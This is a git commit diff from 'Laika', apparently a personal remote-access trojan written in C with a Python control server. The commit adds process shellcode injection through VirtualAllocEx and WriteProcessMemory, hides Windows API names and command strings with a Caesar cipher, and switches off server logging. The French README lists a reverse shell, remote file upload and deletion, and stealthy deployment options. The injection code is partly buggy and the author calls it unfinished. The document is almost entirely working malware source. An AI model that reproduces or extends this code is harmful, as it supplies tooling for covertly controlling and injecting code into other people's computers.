début de shellcode injection, readme update

2023-03-16 08:44:10 +01:00
parent 6e5eb69bfc
commit d1ea71557d
6 changed files with 69 additions and 43 deletions


@@ -287,9 +287,9 @@ retry:
} }
if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject
char* arch = (char*)Api.malloc(3); char* arch = (char*)Api.malloc(2);
if (Api.recv(sock, arch, 3, 0) <= 0) { if (Api.recv(sock, arch, 2, 0) <= 0) {
//send failed //send failed
Api.free(arch); Api.free(arch);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -297,57 +297,75 @@ retry:
} }
CAESAR_DECRYPT(arch); CAESAR_DECRYPT(arch);
// Create a file handle for the memory buffer HANDLE hFile = CreateFileMappingW(
HANDLE hFile = Api.CreateFileW( INVALID_HANDLE_VALUE, // Use the page file
L"ykifyk", NULL, // Default security attributes
GENERIC_READ | GENERIC_WRITE, PAGE_READWRITE, // Read/write access
FILE_SHARE_READ | FILE_SHARE_WRITE, 0, // Map the entire file
NULL, BUFFER_SIZE, // Size of the file (in bytes)
CREATE_ALWAYS, TEXT("idufhiu")); // Name of the file mapping object
FILE_ATTRIBUTE_NORMAL,
NULL);
upload_file(sock, hFile); if (hFile == NULL) {
Api.free(arch);
// Open the file handle for reading
hFile = Api.CreateFileW(
L"ykifyk",
GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == INVALID_HANDLE_VALUE) {
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
char* buffer = (char*)Api.malloc(BUFFER_SIZE); upload_file(sock, hFile);
Api.ReadFile(hFile, buffer, BUFFER_SIZE, NULL, NULL);
Api.CloseHandle(hFile); // Move the file pointer back to the beginning of the file
Api.SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
HANDLE proc; HANDLE proc;
if (Api.strncmp(arch, "x86", strlen("x86")) == 0) { if (Api.strncmp(arch, "32", strlen("32")) == 0) {
proc = FindProcessByArch(L"x86"); proc = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, (DWORD)18872);//FindProcessByArch(L"x86");
} }
else { else {
proc = FindProcessByArch(L"x64"); proc = FindProcessByArch(L"x64");
} }
if (proc == NULL) {
Api.free(arch); Api.free(arch);
Api.free(buffer);
if (proc == NULL) {
Api.CloseHandle(hFile);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
//Api.WriteProcessMemory(proc, (LPVOID)0, "", 0, NULL); WIP // Get the size of the file
LARGE_INTEGER fileSize;
if (!Api.GetFileSizeEx(hFile, &fileSize))
{
Api.CloseHandle(hFile);
Api.CloseHandle(proc);
Sleep_(Sleep_TIME);
goto retry;
}
LPVOID addr = Api.VirtualAllocEx(proc, NULL, (size_t)fileSize.QuadPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (addr == NULL) {
Api.CloseHandle(hFile);
Api.CloseHandle(proc);
Sleep_(Sleep_TIME);
goto retry;
}
DWORD bytesRead;
char* shellcode = (char*)Api.malloc((size_t)fileSize.QuadPart);
if (!Api.ReadFile(hFile, shellcode, sizeof(shellcode), &bytesRead, NULL))
{
Api.free(shellcode);
Api.CloseHandle(hFile);
Api.CloseHandle(proc);
Sleep_(Sleep_TIME);
goto retry;
}
Api.WriteProcessMemory(proc, addr, shellcode, BUFFER_SIZE, NULL);
Api.free(shellcode);
Api.CloseHandle(hFile);
Api.CloseHandle(proc); Api.CloseHandle(proc);
Api.free(arch);
Api.free(buffer);
} }
if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list


@@ -41,6 +41,9 @@ void InitApis() {
Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\")); Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\"));
Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx")); Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx"));
Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~")); Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~"));
Api.VirtualAllocEx = (TVirtualAllocEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("[nwyzfqFqqthJ}"));
Api.SetFilePointer = (TSetFilePointer)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("XjyKnqjUtnsyjw"));
Api.GetFileSizeEx = (TGetFileSizeEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyKnqjXn\x7fjJ}")); //GetFileSieEx
hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq"));
if (!hMsvcrt) { if (!hMsvcrt) {


@@ -69,6 +69,9 @@ typedef HANDLE(WINAPI* TOpenProcess)(DWORD, BOOL, DWORD);
typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W); typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W);
typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL); typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL);
typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*); typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*);
typedef LPVOID(WINAPI* TVirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
typedef DWORD(WINAPI* TSetFilePointer)(HANDLE, LONG, PLONG, DWORD);
typedef BOOL(WINAPI* TGetFileSizeEx)(HANDLE, PLARGE_INTEGER);
typedef struct ApiList { typedef struct ApiList {
Tconnect connect; Tconnect connect;
@@ -115,6 +118,9 @@ typedef struct ApiList {
TProcess32NextW Process32NextW; TProcess32NextW Process32NextW;
TIsWow64Process IsWow64Process; TIsWow64Process IsWow64Process;
TWriteProcessMemory WriteProcessMemory; TWriteProcessMemory WriteProcessMemory;
TVirtualAllocEx VirtualAllocEx;
TSetFilePointer SetFilePointer;
TGetFileSizeEx GetFileSizeEx;
Tmbstowcs mbstowcs; Tmbstowcs mbstowcs;
Twcstombs wcstombs; Twcstombs wcstombs;


@@ -23,7 +23,7 @@ HANDLE FindProcessByArch(const wchar_t* arch)
HANDLE hProcess; HANDLE hProcess;
BOOL isWow64; BOOL isWow64;
hProcess = Api.OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); hProcess = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
if (hProcess == NULL) { if (hProcess == NULL) {
continue; continue;
} }


@@ -145,8 +145,8 @@ def upload_file(fp, sock):
app = Flask(__name__) app = Flask(__name__)
# Disable Flask's default logging # Disable Flask's default logging
#log = logging.getLogger('werkzeug') log = logging.getLogger('werkzeug')
#log.disabled = True log.disabled = True
@app.route('/<path:filename>') @app.route('/<path:filename>')
def serve_file(filename): def serve_file(filename):
@@ -559,10 +559,7 @@ def main() -> None :
continue continue
client.send(CAESAR("inject").encode()) client.send(CAESAR("inject").encode())
if arch == "32" : client.send(CAESAR(arch).encode())
client.send(CAESAR("x86").encode())
else :
client.send(CAESAR("x64").encode())
fp = open(fichier, "rb") fp = open(fichier, "rb")
upload_file(fp, client) upload_file(fp, client)


@@ -1,14 +1,16 @@
# Laika # Laika
J'ai commencé un début de Shellcode injection mais j'ai un peu la flemme de continuer. Pour bien faire il faudrait créer un process "zombie" qui va recevoir les shellcodes à injecter (agents/features), et un watcher qui le relance s'il meurt.<br>
L'agent N'EST PAS plug and play, il manque certaines choses, de plus c'est un projet perso et c'est pas vraiment fait pour être utilisé.<br>
# Agent # Agent
## Features : ## Features :
* Reverse shell * Reverse shell
* File explorer (download/upload/remove) * File explorer (download/upload/remove)
* Shellcode injection (TODO)
## Caractéristiques ## Caractéristiques
* Petit (12ko) * Petit (14ko)
* Fait en C, sans CRT * Fait en C, sans CRT
* x32 bit * x32 bit
* Modulaire (peut se déployer via shellcode/dll/pe injection/.exe) * Modulaire (peut se déployer via shellcode/dll/pe injection/.exe)